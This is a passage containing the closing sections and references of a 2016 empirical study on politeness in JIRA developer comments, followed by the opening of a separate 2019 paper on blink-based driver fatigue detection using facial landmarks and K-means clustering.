Umbrella and New JIRA Project. Figure 10 shows the T⇠ -graph resulting from the values in Table 9. The category New Feature is more polite than Test, Sub-task, Improvement and Wish; Test, Sub-task and Improvement are more polite than Task; Improvement are more polite than Bug. Issues with maintenance Bug are related to defects and software failures. This category presents the lower politeness. Issues with maintenance New Feature are proposals made by developers and it is interesting to see that when proposing something new, developers tend to be more polite. Issues on JIRA are also classified considering the level of priority, as Major, Minor, Blocker (e.g., an issue which blocks development and/or testing work), Critical and Trivial. Table 10 shows the results of the multiple contrast test procedure for the different groups of issue priority. Figure 11 shows the associated T⇠ -graph. Blocker and Critical issues are more polite than Major, Minor and Trivial issues. Major issues are more polite than Minor and Trivial, while Minor are more polite than Trivial. Trivial issues are characterised by lower politeness. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 24/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 Figure 11 T⇠ -graph for issue Priority. Findings. Comments related to issues with maintenance Bug, priority Minor and Trivial, tended to have a lower politeness. Issues with maintenance New Feature, priority Blocker and Critical, tended to have a higher politeness. DISCUSSION Software development, as well as other fields, is an activity organised around team- based environments. The implementation of team structures is not simple and does not necessarily result in success, because it is not enough just to put people together in teams and to presume that everybody knows or agrees on what to do (Allen & Hecht, 2004). People working together apply different personal assumptions and interpretations to their work tasks (Keyton & Beck, 2008). Hence, conflicts within teams are possible. Conflicts affect teams’ productivity and team leaders are certainly interested in knowing how to prevent, Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 25/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 avoid, or, in the worst case, manage conflicts which might occur. In this paper, we presented an analysis about the links between politeness and productivity of developers involved in a project. Politeness is a factor that certainly helps in diminishing conflict and friction between people. The findings of this study contribute in highlighting the importance and the impact of the psychological state of a developer on the software production process. We started the paper by proposing that politeness information mined from software repositories like issue repositories could offer a way to investigate productivity during the software development process. We showed that issue fixing time for polite issues was shorter than issue fixing time for impolite and mixed-issues. This result matches common sense; if someone is asked to accomplish a task in a polite way, there is higher possibility for a relaxed collaboration and faster results. On the other hand, impolite requests can easily generate discomfort, stress and burnout, often negatively impacting the actual time taken to complete a given task. Surprisingly, mixed issues (commented with both polite and impolite comments) presented longer fixing time than impolite issues. The mixed interaction ‘polite-impolite’ between developers could explain this fact. Ortu et al. (2016) showed that when in the presence of impolite or negative comments, the probability of the next comment being impolite or negative was 13% and 25%, respectively. Hence part of the longer time could be spent in trying to shift the exchange of comments toward a (more) polite level. For example, in a small study of a single project with two deadlines (Guzman, 2013b), the authors find that, as deadlines came closer, more and longer emails were exchanged with higher emotional intensity. The lower fixing time for impolite issues (compared to the fixing time of mixed issues) could also be related to the fact that developers (especially newcomers) being addressed with impolite comments can react faster because they feel emotionally pushed and want to show (to the community) that they are able to accomplish a task. As a second point, we showed that a positive correlation existed between the percentage of polite comments and Magnetism and Stickiness of a project. For each project in the corpus, we first calculated the percentage of polite comments per month and the value of Magnetism and Stickiness, generating three time series. We studied each time series for stationarity and then performed correlation analysis. We found that the percentage of polite comments is, for the majority of the project in our corpus, positive correlated with Magnetism and Stickiness. However, we need to point out that the first cross correlation analysis performed for the non-stationary series presented weak correlation values (< 0.5). Higher correlation values were found after the cross correlation analysis of the stationary series (after differencing). The attractiveness of a project is indeed a complex phenomenon and there are different confounding factors (fame and importance of the project could be perceived also as a status-symbol, e.g., being part of the Linux developers community) of which politeness among developers can be part of. Further analysis on a larger corpus of projects are required. Our findings highlight the fact that politeness might be a factor affecting the attractiveness of a project. Third, we found that the percentage of polite comments over time was (for the majority of the projects in our corpus) seasonal and not random. This is an interesting (and somewhat expected) fact that could help managers and developers in better understanding Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 26/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 the development process. Further experiments are required to better analyse the links between seasonality and deadlines that developers face during the development phases. Higher workload could lead to lower politeness, while normal activities can be linked with higher politeness. Fourth, we studied how politeness varied with respect to JIRA maintenance types and issue priorities. Again, the results match common sense. Bug issues Maintenance were those with lower politeness. When something is broken and needs to be fixed, the situation is less attractive and could generate impolite reactions. On the contrary, New Feature issues Maintenance were the ones with higher politeness; those kind of issues indicate a new feature yet to be developed, hence, there might be higher enthusiasm among developers (a developer can be the first one who started working for a New feature; the level of freedom felt for the task can be higher leading to higher politeness) when dealing with such issues. Regarding issue Priority, Critical and Blocker issues were the categories with higher politeness, while Trivial issues were those characterised by lower politeness. Again, this is what one would expect, since critical issues are both important and challenging, while trivial issues might be related to minor programming mistakes and/or poor knowledge of programming practices Knowing when lower politeness will occur can help managers in taking actions aimed at keeping the general mood high and relaxed, lowering and preventing conflicts, obtaining higher productivity as a result. The results presented in this study can be also helpful when defining a team of developers. Knowing the profile (from a politeness point of view) of the developers can provide hints for creating balanced teams. A JIRA plug-in able to present the politeness level of the communication flow in a graphical way (e.g., cockpit view) could help both developers and managers in constantly monitoring the general mood of the developers working for a company or for a project (in the case of open source collaboration paradigm). THREATS TO VALIDITY Threats to external validity correspond to the generalisation of our results (Campbell & Stanley, 1963). In this study, we analysed comments from issue reports from 22 open source projects. Our results cannot be representative of all environments or programming languages, we considered only open-source systems and this could affect the generality of the study. Commercial software is usually developed using different platforms and technologies, by developers with different knowledge and background, with strict deadlines and cost limitations. Replication of this work on other open source systems and on commercial projects are needed to confirm our findings. Also, the politeness tool can be subject to bias due the domain used to train the machine learning classifier. Threats to internal validity concern confounding factors that can influence the obtained results. Based on empirical evidence, we suppose a relationship between the emotional state of developers and what they write in issue reports (Pang & Lee, 2008). Since the main goal of developer communication is the sharing of information, the consequence of removing or camouflaging emotions may make comments less meaningful and cause misunderstanding. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 27/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 This work is focused on sentences written by developers for developers. To illustrate the influence of these comments, it is important to understand the language used by developers. We believe that the tool used for measuring politeness Danescu-Niculescu-Mizil et al. (2013) is valid in the software engineering domain, since the developers also used requests posted on Stack Overflow to train the classifier. The comments used in this study were collected over an extended period from developers unaware of being monitored. For this reason, we are confident that the emotions we analyzed were genuine. We do not claim any causality between politeness and the issue resolution time, but we built an explanatory model to understand the characteristics of issues with short and long fixing time. Confounds could have affected validity of the results for RQ1 about lower issue fixing time for polite and mixed issues. The number of developers involved in discussing issues might differ, as well as severity and complexity of an issue under analysis. Another threat to validity is related to classification of JIRA issue types. As highlighted by Herzig, Just & Zeller (2013) the categorisation of issue reports is dependent on the perspective of the observer. This fact could affect the results obtained for research question 4. Threats to construct validity focus on how accurately the observations describe the phenomena of interest. The detection of emotions from issue reports presents difficulties due to vagueness and subjectivity. The politeness measures are approximated and cannot perfectly identify the precise context, given the challenges of natural language and subtle phenomena like sarcasm. CONCLUSIONS AND FUTURE WORK Software engineers have been trying to measure software to gain quantitative insights into its properties and quality since its inception. In this paper, we present the results about politeness and attractiveness on 22 open-source software projects developed using the Agile board of the JIRA repository. Our results show that the level of politeness in the communication process among developers does have an effect on both the time required to fix issues and the attractiveness of the project to both active and potential developers. The more polite developers were, the less time it took to fix an issue. In the majority of cases, the more the developers wanted to be part of project, the more they were willing to continue working on the project over time. This work is a starting point and further research on a larger number of projects is needed to validate our findings especially, considering proprietary software developed by companies, different programming languages and different dimension. The development of proprietary software follows different dynamics (e.g., strict deadlines and given budget) and this fact could lead to different results. We started the development of an application which will be able to automatically analyse all the comments on a issue tracking systems (as we have done for this paper) and will provide reports and data to managers, team-leaders and/or developers interested in understanding the health of a project from a ‘‘mood’’ point of view. The takeaway message is that politeness can only have a positive effect on a project and on the development process. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 28/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 ACKNOWLEDGEMENTS The authors would like to thank the anonymous reviewers for their valuable comments and suggestions to improve the quality of the paper. ADDITIONAL INFORMATION AND DECLARATIONS Funding The research presented in this paper was partly funded by the Engineering and Physical Sciences Research Council (EPSRC) of the UK under grant ref: EP/M024083/1. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Engineering and Physical Sciences Research Council (EPSRC): EP/M024083/1. Competing Interests The authors declare there are no competing interests. Author Contributions • Giuseppe Destefanis, Marco Ortu and Steve Counsell conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Stephen Swift performed the experiments, analyzed the data, contributed reagents/ma- terials/analysis tools, performed the computation work, reviewed drafts of the paper. • Michele Marchesi contributed reagents/materials/analysis tools, reviewed drafts of the paper. • Roberto Tonelli performed the experiments, contributed reagents/materials/analysis tools, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: We used a public dataset available at http://openscience.us/repo/social-analysis/social- aspects.html, and all the scripts we prepared (along with the raw data) can be found at BitBucket: https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage/ REFERENCES Acuña ST, Gómez M, Juristo N. 2008. Towards understanding the relationship between team climate and software quality—a quasi-experimental study. Empirical Software Engineering 13(4):401–434 DOI 10.1007/s10664-008-9074-8. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 29/35 https://peerj.com http://openscience.us/repo/social-analysis/social-aspects.html http://openscience.us/repo/social-analysis/social-aspects.html https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage/ http://dx.doi.org/10.1007/s10664-008-9074-8 http://dx.doi.org/10.7717/peerj-cs.73 Allen NJ, Hecht TD. 2004. The ‘romance of teams’: toward an understanding of its psychological underpinnings and implications. Journal of Occupational and Orga- nizational Psychology 77(4):439–461 DOI 10.1348/0963179042596469. Amabile T, Barsade SG, Mueller JS, Staw BM. 2005. Affect and creativity at work. Administrative Science Quarterly 50(3):367–403 DOI 10.2189/asqu.2005.50.3.367. Banerjee A, Dolado JJ, Galbraith JW, Hendry D, et al. 1993. Co-integration, error correction, and the econometric analysis of non-stationary data. OUP Catalogue. Bartels R. 1982. The rank version of von neumann’s ratio test for randomness. Journal of the American Statistical Association 77(377):40–46 DOI 10.1080/01621459.1982.10477764. Bazelli B, Hindle A, Stroulia E. 2013. On the personality traits of Stack Overflow users. In: Software Maintenance (ICSM), 2013 29th IEEE International Conference on. Piscataway: IEEE, 460–463. Beck K, Beedle M, Van Bennekum A, Cockburn A, Cunningham W, Fowler M, Grenning J, Highsmith J, Hunt A, Jeffries R, Kern J. 2001. Manifesto for agile software development. Available at http://www.agilemanifesto.org. Box GE, Pierce DA. 1970. Distribution of residual autocorrelations in autoregressive- integrated moving average time series models. Journal of the American statistical Association 65(332):1509–1526 DOI 10.1080/01621459.1970.10481180. Brief AP, Weiss HM. 2002. Organizational behavior: affect in the workplace. Annual Review of Psychology 53(1):279–307 DOI 10.1146/annurev.psych.53.100901.135156. Brockwell PJ, Davis RA. 2006. Introduction to time series and forecasting. New York: Springer Science & Business Media. Campbell DT, Stanley JC. 1963. Experimental and quasi-experimental designs for generalized causal inference. Boston: Houghton Mifflin. Capretz LF. 2003. Personality types in software engineering. International Journal of Human-Computer Studies 58(2):207–214 DOI 10.1016/S1071-5819(02)00137-4. Cockburn A, Highsmith J. 2001. Agile software development: the people factor. Computer 11:131–133. Curtis B, Krasner H, Iscoe N. 1988. A field study of the software design process for large systems. Communications of the ACM 31(11):1268–1287 DOI 10.1145/50087.50089. Danescu-Niculescu-Mizil C, Sudhof M, Jurafsky D, Leskovec J, Potts C. 2013. A com- putational approach to politeness with application to social factors. In: Proceedings of ACL. Diebold FX, Rudebusch GD. 1991. On the power of Dickey-Fuller tests against fractional alternatives. Economics Letters 35(2):155–160 DOI 10.1016/0165-1765(91)90163-F. Ehlers J. 2015. Socialness in the recruiting of software engineers. In: Proceedings of the 12th ACM international conference on computing frontiers. New York: ACM, 33. Erez A, Isen AM. 2002. The influence of positive affect on the components of expectancy motivation. Journal of Applied Psychology 87(6):1055–1067 DOI 10.1037/0021-9010.87.6.1055. Fagerholm F, Ikonen M, Kettunen P, Münch J, Roto V, Abrahamsson P. 2014. How do software developers experience team performance in lean and agile environments? Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 30/35 https://peerj.com http://dx.doi.org/10.1348/0963179042596469 http://dx.doi.org/10.2189/asqu.2005.50.3.367 http://dx.doi.org/10.1080/01621459.1982.10477764 http://www.agilemanifesto.org http://dx.doi.org/10.1080/01621459.1970.10481180 http://dx.doi.org/10.1146/annurev.psych.53.100901.135156 http://dx.doi.org/10.1016/S1071-5819(02)00137-4 http://dx.doi.org/10.1145/50087.50089 http://dx.doi.org/10.1016/0165-1765(91)90163-F http://dx.doi.org/10.1037/0021-9010.87.6.1055 http://dx.doi.org/10.7717/peerj-cs.73 In: Proceedings of the 18th international conference on evaluation and assessment in software engineering. New York: ACM, 7. Feldt R, Torkar R, Angelis L, Samuelsson M. 2008. Towards individualized software engineering: empirical studies should collect psychometrics. In: Proceedings of the 2008 international workshop on Cooperative and human aspects of software engineering. New York: ACM, 49–52. Garcia D, Zanetti MS, Schweitzer F. 2013. The role of emotions in contributors activity: a case study on the Gentoo community. In: Cloud and green computing (CGC), 2013 third international conference on. Piscataway: IEEE, 410–417. Gómez MN, Acuña ST, Genero M, Cruz-Lemus JA. 2012. How does the extraversion of software development teams influence team satisfaction and software quality? A controlled experiment. International Journal of Human Capital and Information Technology Professionals (IJHCITP) 3(4):11–24 DOI 10.4018/jhcitp.2012100102. Graziotin D, Wang X, Abrahamsson P. 2014. Happy software developers solve problems better: psychological measurements in empirical software engineering. PeerJ 2:e289 DOI 10.7717/peerj.289. Graziotin D, Wang X, Abrahamsson P. 2015. How do you feel, developer? An explana- tory theory of the impact of affects on programming performance. PeerJ Computer Science 1:e18 DOI 10.7717/peerj-cs.18. Guzman E. 2013a. Visualizing emotions in software development projects. In: 2013 1st IEEE working conference on software visualization—proceedings of VISSOFT 2013. Piscataway: IEEE, 1–4. Guzman E. 2013b. Visualizing emotions in software projects. In: Software visualization (VISSOFT), 2013 first IEEE working conference on. Piscataway: IEEE, 1–4. Guzman E, Azócar D, Li Y. 2014. Sentiment analysis of commit comments in GitHub: an empirical study. In: Proceedings of the 11th Working Conference on Mining Software Repositories—MSR 2014. New York: ACM Press, 352–355. Guzman E, Bruegge B. 2013. Towards emotional awareness in software development teams. In: Proceedings of the 2013 9th joint meeting on foundations of software engineering. New York: ACM Press, 671–674. Hamilton JD. 1994. Time series analysis, vol. 2. Princeton university press Princeton. Herzig K, Just S, Zeller A. 2013. It’s not a bug, it’s a feature: how misclassification impacts bug prediction. In: Proceedings of the 2013 international conference on software engineering. Piscataway: IEEE Press, 392–401. Jongeling R, Datta S, Serebrenik A. 2015. Choosing your weapons: on sentiment analysis tools for software engineering research. In: Software maintenance and evolution (ICSME), 2015 IEEE international conference on. Piscataway: IEEE, 531–535. Kaluzniacky E. 2004. Managing psychological factors in information systems work: an orientation to emotional intelligence. Hershey: IGI Global. Keyton J, Beck SJ. 2008. Team attributes, processes, and values: a pedagogical framework. Business Communication Quarterly 71(4):488–504 DOI 10.1177/1080569908325863. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 31/35 https://peerj.com http://dx.doi.org/10.4018/jhcitp.2012100102 http://dx.doi.org/10.7717/peerj.289 http://dx.doi.org/10.7717/peerj.289 http://dx.doi.org/10.7717/peerj-cs.18 http://dx.doi.org/10.1177/1080569908325863 http://dx.doi.org/10.7717/peerj-cs.73 Konietschke F, Hothorn LA, Brunner E. 2012. Rank-based multiple test procedures and simultaneous confidence intervals. Electronic Journal of Statistics 6:738–759 DOI 10.1214/12-EJS691. Kramer ADI, Guillory JE, Hancock JT. 2014. Experimental evidence of massive-scale emotional contagion through social networks. Proceedings of the National Academy of Sciences of the United States of America 111(24):8788–8790 DOI 10.1073/pnas.1320040111. Kri≤toufek L. 2014. Measuring correlations between non-stationary series with DCCA coefficient. Physica A: Statistical Mechanics and its Applications 402:291–298 DOI 10.1016/j.physa.2014.01.058. Kruskal WH, Wallis WA. 1952. Use of ranks in one-criterion variance analysis. Journal of the American statistical Association 47(260):583–621 DOI 10.1080/01621459.1952.10483441. Kwiatkowski D, Phillips PC, Schmidt P, Shin Y. 1992. Testing the null hypothesis of stationarity against the alternative of a unit root: how sure are we that economic time series have a unit root? Journal of econometrics 54(1):159–178 DOI 10.1016/0304-4076(92)90104-Y. Ljung GM, Box GE. 1978. On a measure of lack of fit in time series models. Biometrika 65(2):297–303 DOI 10.1093/biomet/65.2.297. Miner AG, Glomb TM. 2010. State mood, task performance, and behavior at work: a within-persons approach. Organizational Behavior and Human Decision Processes 112(1):43–57 DOI 10.1016/j.obhdp.2009.11.009. Murgia A, Concas G, Tonelli R, Ortu M, Demeyer S, Marchesi M. 2014a. On the influence of maintenance activity types on the issue resolution time. In: Proceedings of the 10th international conference on predictive models in software engineering. New York: ACM, 12–21. Murgia A, Tourani P, Adams B, Ortu M. 2014b. Do developers feel emotions? an exploratory analysis of emotions in software artifacts. In: Proceedings of the 11th working conference on mining software repositories. New York: ACM, 262–271. Novielli N, Calefato F, Lanubile F. 2014. Towards discovering the role of emotions in Stack Overflow. In: Proceedings of the 6th international workshop on social software engineering. New York: ACM, 33–36. Ortu M, Adams B, Destefanis G, Tourani P, Marchesi M, Tonelli R. 2015a. Are bullies more productive? Empirical study of affectiveness vs. issue fixing time. In: Proceedings of the 12th working conference on mining software repositories, MSR 2015. Ortu M, Destefanis G, Counsell S, Swift S, Tonelli R, Marchesi M. 2016. Arsonists or firefighters? Affectiveness in agile software development. In: Agile processes, in software engineering, and extreme programming. Berlin Heidelberg: Springer International Publishing, 144–155. Ortu M, Destefanis G, Kassab M, Counsell S, Marchesi M, Tonelli R. 2015b. Would you mind fixing this issue? an empirical analysis of politeness and attractiveness in software developed using agile boards. In: Agile processes, in software engineering, Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 32/35 https://peerj.com http://dx.doi.org/10.1214/12-EJS691 http://dx.doi.org/10.1214/12-EJS691 http://dx.doi.org/10.1073/pnas.1320040111 http://dx.doi.org/10.1016/j.physa.2014.01.058 http://dx.doi.org/10.1016/j.physa.2014.01.058 http://dx.doi.org/10.1080/01621459.1952.10483441 http://dx.doi.org/10.1016/0304-4076(92)90104-Y http://dx.doi.org/10.1093/biomet/65.2.297 http://dx.doi.org/10.1016/j.obhdp.2009.11.009 http://dx.doi.org/10.7717/peerj-cs.73 and extreme programming. Berlin Heidelberg: Springer International Publishing, 129–140. Ortu M, Destefanis G, Kassab M, Marchesi M. 2015c. Measuring and understanding the effectiveness of jira developers communities. In: Proceedings of the 6th International Workshop on Emerging Trends in Software Metrics, WETSoM 2015. Ortu M, Destefanis G, Murgia A, Marchesi M, Tonelli R, Adams B. 2015d. The JIRA repository dataset: understanding social aspects of software development. In: Proceedings of the 11th international conference on predictive models and data analytics in software engineering. New York: ACM, 1. Pang B, Lee L. 2008. Opinion mining and sentiment analysis. Foundations and Trends in Information Retrieval 2(1–2):1–135 DOI 10.1561/1500000011. Panichella S, Di Sorbo A, Guzman E, Visaggio CA, Canfora G, Gall HC. 2015. How can I improve my app? Classifying user reviews for software maintenance and evolution. In: Software maintenance and evolution (ICSME), 2015 IEEE international conference on. Piscataway: IEEE, 281–290. Pennebaker JW, Francis ME, Booth RJ. 2001. Linguistic inquiry and word count: Liwc 2001. Mahway: Lawrence Erlbaum Associates 71:2001. Perry T. 2008. Drifting toward invisibility: the transition to the electronic task board. In: Agile, 2008. AGILE’08. Conference. Piscataway: IEEE, 496–500. Pletea D, Vasilescu B, Serebrenik A. 2014. Security and emotion: sentiment analysis of security discussions on GitHub. In: Proceedings of the 11th working conference on mining software repositories. New York: ACM, 348–351. Priestley MB. 1981. Spectral analysis and time series. San Diego: Academic Press. Priestley MB. 1988. Non-linear and non-stationary time series analysis. Amsterda: Elsevier. R Development Core Team. 2014. R: a language and environment for statistical comput- ing. Vienna: the R Foundation for Statistical Computing. Available at http://www.R- project.org/ . Rigby PC, Hassan AE. 2007. What can OSS mailing lists tell us? A preliminary psycho- metric text analysis of the Apache developer mailing list. In: Proceedings of the fourth international workshop on mining software repositories. Piscataway: IEEE Computer Society, 23. Roberts JA, Hann I-H, Slaughter SA. 2006. Understanding the motivations, participa- tion, and performance of open source software developers: a longitudinal study of the Apache projects. Management Science 52(7):984–999 DOI 10.1287/mnsc.1060.0554. Rousinopoulos A-I, Robles G, González-Barahona JM. 2014. Sentiment analysis of free/open source developers: preliminary findings from a case study. Revista Eletrônica de Sistemas de Informação 13(2):1677–3071 DOI 10.5329/RESI. Said SE, Dickey DA. 1984. Testing for unit roots in autoregressive-moving average models of unknown order. Biometrika 71(3):599–607 DOI 10.1093/biomet/71.3.599. Siegel S. 1956. Nonparametric statistics for the behavioral sciences. New York: McGraw- Hill. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 33/35 https://peerj.com http://dx.doi.org/10.1561/1500000011 http://www.R-project.org/ http://www.R-project.org/ http://dx.doi.org/10.1287/mnsc.1060.0554 http://dx.doi.org/10.5329/RESI http://dx.doi.org/10.1093/biomet/71.3.599 http://dx.doi.org/10.7717/peerj-cs.73 ëliwerski J, Zimmermann T, Zeller A. 2005. Don’t program on Fridays! How to locate fix-inducing changes. In: Proceedings of the 7th workshop software reengineering. Available at http://thomas-zimmermann.com/publications/files/sliwerski-wsr-2005. pdf . Steinmacher I, Conte TU, Gerosa M, Redmiles D. 2015. Social barriers faced by newcomers placing their first contribution in open source software projects. In: Proceedings of the 18th ACM conference on computer supported cooperative work & social computing. New York: ACM, 1–13. Tan S, Howard-Jones P. 2014. Rude or polite: do personality and emotion in an artificial pedagogical agent affect task performance? In: 2014 global conference on teaching and learning with technology (CTLT 2014). 41. Tourani P, Jiang Y, Adams B. 2014. Monitoring sentiment in open source mailing lists: exploratory study on the Apache ecosystem. In: Proceedings of 24th annual international conference on computer science and software engineering. Armonk: IBM Corporation, 34–44. Available at http://mcis.soccerlab.polymtl.ca/publications/2014/ cascon14.pdf . Tsay J, Dabbish L, Herbsleb J. 2014. Let’s talk about it: evaluating contributions through discussion in GitHub. In: Proceedings of the 22nd ACM SIGSOFT international symposium on foundations of software engineering. New York: ACM, 144–154. Tukey JW. 1949. Comparing individual means in the analysis of variance. Biometrics 5(2):99–114 DOI 10.2307/3001913. Vasilescu B, Filkov V, Serebrenik A. 2013. Stack overflow and GitHub: associations between software development and crowdsourced knowledge. In: Social computing (SocialCom), 2013 international conference on. Piscataway: IEEE, 188–195. Vasilescu B, Serebrenik A, Goeminne M, Mens T. 2014a. On the variation and special- isation of workload—a case study of the Gnome ecosystem community. Empirical Software Engineering 19(4):955–1008 DOI 10.1007/s10664-013-9244-1. Vasilescu B, Serebrenik A, Mens T, Van den Brand MGJ, Pek E. 2014b. How healthy are software engineering conferences? Science of Computer Programming 89:251–272 DOI 10.1016/j.scico.2014.01.016. VersionOne. 2013. 8th Annual State of Agile Survey report. San Francisco: VersionOne. Available at https://www.versionone.com/pdf/2013-state-of-agile-survey.pdf . Weiss C, Premraj R, Zimmermann T, Zeller A. 2007. How long will it take to fix this bug? In: Proceedings of the fourth international workshop on mining software repositories. Piscataway: IEEE Computer Society, 1. Winschiers H, Paterson B. 2004. Sustainable software development. In: Proceedings of the 2004 annual research conference of the South African Institute of Computer Scientists and Information Technologists on IT research in developing countries. South African Institute for Computer Scientists and Information Technologists, 274–278. Yamashita K, Kamei Y, McIntosh S, Hassan AE, Ubayashi N. 2016. Magnet or sticky? Measuring project characteristics from the perspective of developer attraction and retention. Journal of Information Processing 24(2):339–348 DOI 10.2197/ipsjjip.24.339. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 34/35 https://peerj.com http://thomas-zimmermann.com/publications/files/sliwerski-wsr-2005.pdf http://thomas-zimmermann.com/publications/files/sliwerski-wsr-2005.pdf http://mcis.soccerlab.polymtl.ca/publications/2014/cascon14.pdf http://mcis.soccerlab.polymtl.ca/publications/2014/cascon14.pdf http://dx.doi.org/10.2307/3001913 http://dx.doi.org/10.1007/s10664-013-9244-1 http://dx.doi.org/10.1016/j.scico.2014.01.016 http://dx.doi.org/10.1016/j.scico.2014.01.016 https://www.versionone.com/pdf/2013-state-of-agile-survey.pdf http://dx.doi.org/10.2197/ipsjjip.24.339 http://dx.doi.org/10.2197/ipsjjip.24.339 http://dx.doi.org/10.7717/peerj-cs.73 Yamashita K, McIntosh S, Kamei Y, Ubayashi N. 2014. Magnet or sticky? An OSS project-by-project typology. In: Proceedings of the 11th working conference on mining software repositories. New York: ACM, 344–347. Zhang H, Gong L, Versteeg S. 2013. Predicting bug-fixing time: an empirical study of commercial software projects. In: Proceedings of the 2013 international conference on software engineering. Piscataway: IEEE Press, 1042–1051. Zhang F, Khomh F, Zou Y, Hassan AE. 2012. An empirical study on factors impacting bug fixing time. In: 2012 19th working conference on reverse engineering (WCRE). Piscataway: IEEE, 225–234. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 35/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 work_h3apwa2ag5bdjj7shw5i5z5iou ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 DOI: 10.21307/ijanmc-2019-067 24 Detection of Blink State Based on Fatigued Driving Lei Chao School of computer science and engineering, Xi’an Technological University Xi’an, China E-mail:callofduty2015@163.com Wang Changyuan School of computer science and engineering, Xi’an Technological University Xi’an, China E-mail:cyw901@163.com Li Guang School of computer science and engineering, Xi’an Technological University Xi’an, China E-mail:865413666@qq.com Shi Lu School of computer science and engineering, Xi’an Technological University Xi’an, China E-mail:892178238@qq.com Abstract—In recent years, with the improvement of the national economy, the penetration rate of automobiles has been increasing, and traffic accidents have also increased. Fatigue driving is the main factor in many traffic accidents. Fatigue driving can cause the driver's inattention, slow response, and make wrong decisions on danger signals, which affect the driver's personal safety. In modern development, driving safety is developing towards intelligence and safety. Therefore, the detection of driver fatigue has become a generally accepted demand. This paper proposes a method to calculate the threshold of blinking, which can detect the blinking state of the driver in real time through video. During the driving process, when the driver is in the closed eye state for a long time, an early warning is issued to avoid the accident. This paper uses Python language to achieve the first, through the digital image technology call Dlib open source library to detect 68 feature points of the face, and then measure the aspect ratio between the length and width of the human eye, and finally through the Kmeans clustering algorithm to collect the ratio The analysis yields the blink threshold. The experimental results show that the recognition rate is 92.5% when the video frame rate is 30, and the recognition accuracy is 92.5%. The experimental results show that the method designed in this paper can quickly detect the fatigue characteristics of the human eye, has a higher recognition rate and accuracy for fatigue driving, and helps reduce the occurrence of traffic accidents. Keywords-Blinking Algorithm; Fatigue Detection; Digital Image Processing; Clustering Algorithm; Key Points Of Human Eyes I. INTRODUCTION With the improvement of people's material living standards, cars have become the main means of transportation for people, but the growing number of vehicles has led to more traffic accidents. According to statistics, fatigue driving is the main cause of traffic accidents[1,2].Under normal circumstances, the medical community believes that there are two reasons for fatigue driving, one is because the driver's attention is too concentrated, and the other is that the body does not rest well. Because of being in this state for a long time, the body will be fatigued, lose concentration, the driver will snoring, lose concentration, decrease the ability to judge dangerous situations, and cause traffic accidents. At present, there are relatively few applications of fatigue driving equipment in China's in-vehicle systems. Fatigue detection mainly through facial features, eye and mouth features, human electrical signal characteristics and convolutional neural network characteristics[3,4,5].The detection of facial features is generally based on the frequency of blinking eyes, the degree of mouth opening, and the frequency of head movements due to fatigue. The fatigue of human body electrical signals is generally the measurement of surface EMG signals, because human fatigue can be expressed by muscle physiological information. Surface EMG signals can reflect real-time physiological processes of muscle information and physiological signals on the skin surface. Convolutional neural networks generally extract facial features through image processing methods, and then extract the main features through convolutional layers, pooling layers, and fully connected layers to analyze and determine whether fatigue. Chen[6] uses the ASM algorithm to accurately locate the eyes and mouth area, calculates the eye's aspect ratio, mouth height value, and black and white pixel ratio near the mouth, and obtains the blink frequency and mouth opening degree. The degree of mouth opening is used as an input to the fuzzy International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 25 inference engine to obtain three types of fatigue levels to accurately quantify the degree of fatigue The method proposed in this paper is to judge the driver's fatigue driving according to the characteristics of the human eye. Because the digital image processing open source visual library OpenCV comes with a human face detection library, but the disadvantage is that the lighting requirements are very high, the lighting slightly changed, it will be difficult to locate or inaccurate positioning[7]. Therefore, this paper chooses Dlib open source library to detect human eye features. Firstly, the 68 face feature points provided by the Dlib open source library are used to accurately calibrate the position of the face and the human eye, and then the aspect ratio between the length and the width of the human eye is measured. Finally, the Kmeans clustering algorithm is used to analyze the collected ratio. The threshold of blinking. Figure 1 below, a is the 68 face feature points marked by Dlib, and b is the feature point on the face of the paper. (a) 68 feature points of a face annotation (b) Recognition of face images Figure 1. Facial feature points II. RELATED WORK A. Blink detection and threshold analysis methods This chapter mainly introduces the blink algorithm formula and blink threshold analysis method. The blink threshold analysis method uses the Kmeans clustering algorithm in machine learning. There are many methods for blink detection, such as support vector machine classification, eye movement sequence analysis, convolutional neural network feature extraction, eye feature point analysis, etc. This article uses the eye feature analysis method. Threshold analysis methods in machine learning usually use regression algorithms, decision tree methods, Bayesian methods, and clustering algorithms. This article uses the Kmeans clustering algorithm in machine learning. B. Blinking formula There are currently many methods in the field of blink detection. Andrej Fogelto et al[8] analyzed the relationship between the speed of blinking and the duration of time through the cyclic neural network (RNN), so as to better distinguish the state of blink and blink, through the comparison of one-way and two-way circulating neural networks. One-way neural networks work better in blink detection. However, neural networks have their own limitations. For example, network merging will lose a lot of information. In the field of face recognition, the relationship between part and whole is neglected, and each person's face features are different, so 